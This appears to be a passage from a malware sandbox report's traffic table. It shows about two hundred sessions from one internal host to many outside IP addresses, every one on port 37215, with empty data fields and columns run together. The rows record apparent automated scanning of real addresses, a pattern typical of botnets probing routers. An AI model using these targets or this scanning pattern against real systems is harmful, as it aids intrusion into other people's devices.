                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4480192.168.2.1350406124.245.201.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4481192.168.2.13454909.212.67.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4482192.168.2.1355708157.203.223.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4483192.168.2.1341040112.10.89.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4484192.168.2.1338206197.165.213.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4485192.168.2.133499641.89.85.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4486192.168.2.1356864157.142.168.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4487192.168.2.1353396197.164.227.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4488192.168.2.134815059.111.6.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4489192.168.2.1349752157.187.232.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4490192.168.2.1347246157.135.0.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4491192.168.2.1337420197.238.225.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4492192.168.2.1333598197.137.234.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4493192.168.2.1335274158.8.66.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4494192.168.2.1354074157.51.67.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4495192.168.2.1360302197.212.183.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4496192.168.2.1349448157.142.91.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4497192.168.2.1344518197.168.212.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4498192.168.2.1337648170.149.141.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4499192.168.2.135783241.136.15.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4500192.168.2.1349248197.199.100.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4501192.168.2.134464841.89.13.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4502192.168.2.133546044.92.129.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4503192.168.2.1337070197.239.122.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4504192.168.2.1334646164.8.164.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4505192.168.2.1339744197.3.238.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4506192.168.2.1354846197.194.10.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4507192.168.2.1338440205.134.228.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4508192.168.2.134493041.37.162.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4509192.168.2.1347762197.117.111.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4510192.168.2.1359138197.254.15.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4511192.168.2.134086241.205.127.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4512192.168.2.1334646178.121.246.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4513192.168.2.135626041.4.113.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4514192.168.2.1343142157.145.145.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4515192.168.2.134765441.32.249.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4516192.168.2.1359818197.135.197.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4517192.168.2.134728839.129.73.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4518192.168.2.1339768157.2.229.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4519192.168.2.134069841.171.216.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4520192.168.2.1353918157.90.114.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4521192.168.2.134040241.10.48.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4522192.168.2.1357636105.74.3.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4523192.168.2.133949241.140.168.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4524192.168.2.1335398197.178.12.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4525192.168.2.1337008158.34.65.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4526192.168.2.135213241.11.25.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4527192.168.2.1340294207.221.64.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4528192.168.2.1339960157.20.94.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4529192.168.2.1351858194.105.141.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4530192.168.2.1333644157.74.138.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4531192.168.2.1344746157.10.234.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4532192.168.2.1341208129.13.23.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4533192.168.2.135171842.172.42.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4534192.168.2.1345210157.3.183.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4535192.168.2.135762637.70.203.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4536192.168.2.1332874157.54.233.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4537192.168.2.1345384197.130.151.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4538192.168.2.1336530144.91.95.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4539192.168.2.1340724157.119.244.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4540192.168.2.1359864197.36.213.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4541192.168.2.134247241.242.7.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4542192.168.2.1344646197.182.119.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4543192.168.2.1334344157.204.87.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4544192.168.2.1345434104.133.29.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4545192.168.2.1345594197.18.56.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4546192.168.2.1341770109.132.227.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4547192.168.2.1356524157.234.43.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4548192.168.2.1334740150.110.187.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4549192.168.2.135315841.21.172.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4550192.168.2.135245464.176.178.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4551192.168.2.133554041.152.216.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4552192.168.2.1333324157.4.106.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4553192.168.2.1350626157.131.98.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4554192.168.2.1340616197.248.29.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4555192.168.2.135010241.98.59.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4556192.168.2.1344670197.184.185.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4557192.168.2.1341228197.35.204.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4558192.168.2.1358680157.245.203.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4559192.168.2.134853841.94.53.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4560192.168.2.1358990197.87.183.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4561192.168.2.1333060120.38.126.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4562192.168.2.134684841.113.218.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4563192.168.2.1342342162.72.226.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4564192.168.2.1339124157.166.141.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4565192.168.2.1359928157.106.160.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4566192.168.2.1337030197.63.168.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4567192.168.2.1349666197.144.190.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4568192.168.2.133512025.9.97.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4569192.168.2.135568241.74.119.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4570192.168.2.1340102151.165.189.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4571192.168.2.1347992157.72.140.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4572192.168.2.1333060157.3.56.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4573192.168.2.135346241.48.55.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4574192.168.2.134827441.143.140.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4575192.168.2.133627241.252.81.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4576192.168.2.1347630118.55.100.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4577192.168.2.1344958197.190.3.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4578192.168.2.1342216157.96.151.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4579192.168.2.133311419.128.236.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4580192.168.2.1337284157.92.43.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4581192.168.2.135730841.105.169.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4582192.168.2.133472041.220.238.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4583192.168.2.1357652157.155.246.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4584192.168.2.1347690157.15.13.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4585192.168.2.1358538134.217.176.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4586192.168.2.133367892.78.247.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4587192.168.2.1341310197.189.216.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4588192.168.2.1346704197.105.74.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4589192.168.2.1337374113.216.58.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4590192.168.2.1349744157.128.26.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4591192.168.2.133632041.37.146.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4592192.168.2.1356652197.119.28.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4593192.168.2.1337312197.107.153.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4594192.168.2.1337664157.232.121.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4595192.168.2.1351630197.21.155.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4596192.168.2.1357138197.238.251.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4597192.168.2.133731827.216.27.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4598192.168.2.1344218197.170.227.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4599192.168.2.133453841.236.67.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4600192.168.2.1359180157.19.162.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4601192.168.2.133602850.6.34.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4602192.168.2.1356488197.162.54.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4603192.168.2.1356210157.70.173.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4604192.168.2.1353708197.138.158.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4605192.168.2.133943041.118.242.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4606192.168.2.1352678157.201.57.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4607192.168.2.135881631.110.155.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4608192.168.2.1346770164.239.36.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4609192.168.2.1357632132.49.237.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4610192.168.2.135498841.167.219.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4611192.168.2.1345470105.253.108.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4612192.168.2.1356282175.237.236.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4613192.168.2.134499441.229.203.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4614192.168.2.1339226157.142.245.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4615192.168.2.1351924197.135.27.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4616192.168.2.1333736197.224.152.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4617192.168.2.134590831.94.74.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4618192.168.2.1355504157.75.168.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4619192.168.2.134202641.137.114.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4620192.168.2.1353452157.89.27.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4621192.168.2.1336686196.241.12.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4622192.168.2.133444441.69.24.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4623192.168.2.1353062197.110.67.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4624192.168.2.133617841.220.33.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4625192.168.2.1357322157.121.192.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4626192.168.2.1338306197.230.186.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4627192.168.2.134243441.201.193.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4628192.168.2.135572241.133.111.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4629192.168.2.1344296197.139.216.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4630192.168.2.1345596157.143.55.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4631192.168.2.1360250197.82.65.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4632192.168.2.1349824197.171.222.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4633192.168.2.134790241.217.249.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4634192.168.2.135520041.117.2.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4635192.168.2.1346114157.77.111.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4636192.168.2.1346762142.68.174.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4637192.168.2.1355302157.35.118.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4638192.168.2.1351872197.64.73.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4639192.168.2.1340052157.242.111.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4640192.168.2.1348582107.105.113.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4641192.168.2.1359194144.198.153.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4642192.168.2.1336948197.21.148.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4643192.168.2.1339408197.187.109.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4644192.168.2.1359880186.44.38.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4645192.168.2.135464641.250.208.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4646192.168.2.1341874197.195.107.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4647192.168.2.134698441.130.185.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4648192.168.2.134334241.71.141.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4649192.168.2.134573841.196.17.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4650192.168.2.1346338210.66.91.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4651192.168.2.1333004216.82.203.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4652192.168.2.1344148197.251.123.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4653192.168.2.136027841.230.38.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4654192.168.2.1353188157.188.89.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4655192.168.2.1347156147.99.19.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4656192.168.2.1354304197.245.60.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4657192.168.2.136080441.33.232.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4658192.168.2.1336682157.32.241.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4659192.168.2.1352652197.121.83.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4660192.168.2.1354062222.194.248.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4661192.168.2.1354286197.9.38.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4662192.168.2.135694441.155.62.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4663192.168.2.1358476197.90.109.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4664192.168.2.134432241.14.241.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4665192.168.2.1337594166.212.142.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4666192.168.2.134318853.48.17.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4667192.168.2.1340890197.231.107.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4668192.168.2.1338214218.123.88.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4669192.168.2.1339110157.171.236.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4670192.168.2.1359812157.208.231.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4671192.168.2.1343234197.228.225.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4672192.168.2.1333484193.106.93.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4673192.168.2.1351154157.95.175.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4674192.168.2.1345658197.97.218.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4675192.168.2.1356928111.61.8.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4676192.168.2.136001041.193.132.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4677192.168.2.135309641.173.204.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4678192.168.2.1343396157.16.101.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4679192.168.2.133989641.99.180.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4680192.168.2.1356948157.81.71.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4681192.168.2.1351800197.161.179.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4682192.168.2.1345112197.191.74.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4683192.168.2.1357468157.244.33.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4684192.168.2.1353322197.221.242.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4685192.168.2.1349140182.48.119.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4686192.168.2.1350950157.31.45.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4687192.168.2.1353354158.46.181.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4688192.168.2.133612241.179.180.24337215
                                                  TimestampBytes transferredDirectionData


